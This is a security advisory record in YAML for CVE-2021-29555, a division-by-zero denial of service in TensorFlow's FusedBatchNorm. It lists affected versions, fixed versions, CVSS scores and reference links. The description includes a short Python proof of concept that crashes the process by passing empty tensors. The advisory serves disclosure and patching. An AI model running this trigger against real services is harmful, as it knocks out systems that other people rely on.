---
identifier: "CVE-2021-29555"
identifiers:
- "CVE-2021-29555"
- "GHSA-r35g-4525-29fq"
package_slug: "pypi/tensorflow-gpu"
title: "Division by 0 in `FusedBatchNorm`"
description: "An attacker can cause a denial of service via a FPE runtime error in
  `tf.raw_ops.FusedBatchNorm`:\n\n```python\nimport tensorflow as tf\n\nx = tf.constant([],
  shape=[1, 1, 1, 0], dtype=tf.float32)\nscale = tf.constant([], shape=[0], dtype=tf.float32)\noffset
  = tf.constant([], shape=[0], dtype=tf.float32)\nmean = tf.constant([], shape=[0],
  dtype=tf.float32)\nvariance = tf.constant([], shape=[0], dtype=tf.float32)\nepsilon
  = 0.0\nexponential_avg_factor = 0.0\ndata_format = \"NHWC\"\nis_training = False\n\ntf.raw_ops.FusedBatchNorm(\nx=x,
  scale=scale, offset=offset, mean=mean,\nvariance=variance, epsilon=epsilon,\nexponential_avg_factor=exponential_avg_factor,\ndata_format=data_format,
  is_training=is_training)\n```"
date: "2024-10-31"
pubdate: "2021-05-21"
affected_range: "<2.1.4||>=2.2.0,<2.2.3||>=2.3.0,<2.3.3||>=2.4.0,<2.4.2"
fixed_versions:
- "2.1.4"
- "2.2.3"
- "2.3.3"
- "2.4.2"
affected_versions: "All versions before 2.1.4, all versions starting from 2.2.0 before
  2.2.3, all versions starting from 2.3.0 before 2.3.3, all versions starting from
  2.4.0 before 2.4.2"
not_impacted: "All versions starting from 2.1.4 before 2.2.0, all versions starting
  from 2.2.3 before 2.3.0, all versions starting from 2.3.3 before 2.4.0, all versions
  starting from 2.4.2"
solution: "Upgrade to versions 2.1.4, 2.2.3, 2.3.3, 2.4.2 or above."
urls:
- "https://nvd.nist.gov/vuln/detail/CVE-2021-29555"
- "https://github.com/advisories/GHSA-r35g-4525-29fq"
- "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-r35g-4525-29fq"
- "https://github.com/tensorflow/tensorflow/commit/1a2a87229d1d61e23a39373777c056161eb4084d"
- "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-483.yaml"
- "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-681.yaml"
- "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-192.yaml"
- "https://github.com/tensorflow/tensorflow"
cvss_v2: "AV:L/AC:L/Au:N/C:N/I:N/A:P"
cvss_v3: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
uuid: "c471cd4e-2b86-4f05-9dee-1e50411db2f3"
cwe_ids:
- "CWE-369"
- "CWE-937"
- "CWE-1035"
